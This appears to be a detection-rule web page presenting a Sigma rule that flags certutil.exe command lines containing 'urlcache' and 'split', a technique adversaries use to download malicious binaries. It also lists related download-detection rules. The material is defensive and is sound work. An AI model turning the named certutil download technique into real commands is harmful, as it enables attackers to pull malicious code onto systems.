CertUtil Downloading Malicious Binaries
Adversaries often bypass security controls by using the Windows Certificate Utility (certutil.exe) to download malicious code. In general, they leverage certutil.exe along with the -split command-line option. Part of the RedCanary 2024 Threat Detection Report.
Sigma rule (View on GitHub)
1title: CertUtil Downloading Malicious Binaries
2id: 95d670e1-ce19-4269-b101-e12a1bce7c41
3status: experimental
4description: |
5 Adversaries often bypass security controls by using the Windows Certificate
6 Utility (certutil.exe) to download malicious code. In general, they leverage
7 certutil.exe along with the -split command-line option. Part of the RedCanary
8 2024 Threat Detection Report.
9references:
10 - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
11author: RedCanary, Sigma formatting by Micah Babinski
12date: 2024/03/21
13tags:
14 - attack.command_and_control
15 - attack.t1105
16logsource:
17 category: process_creation
18 product: windows
19detection:
20 selection:
21 Image|endswith: '\certutil.exe'
22 CommandLine|contains|all:
23 - 'urlcache'
24 - 'split'
25 condition: selection
26falsepositives:
27 - Unknown
28level: low```
References
-
Ingress Tool Transfer is a technique adversaries leverage to bring their own external tools into a compromised network.
Read More
Related rules
- BITSAdmin Downloading Malicious Binaries
- Certreq Downloading Malicious Binaries
- Replace.exe Usage
- Script Initiated Connection to Non-Local Network
- Curl Download And Execute Combination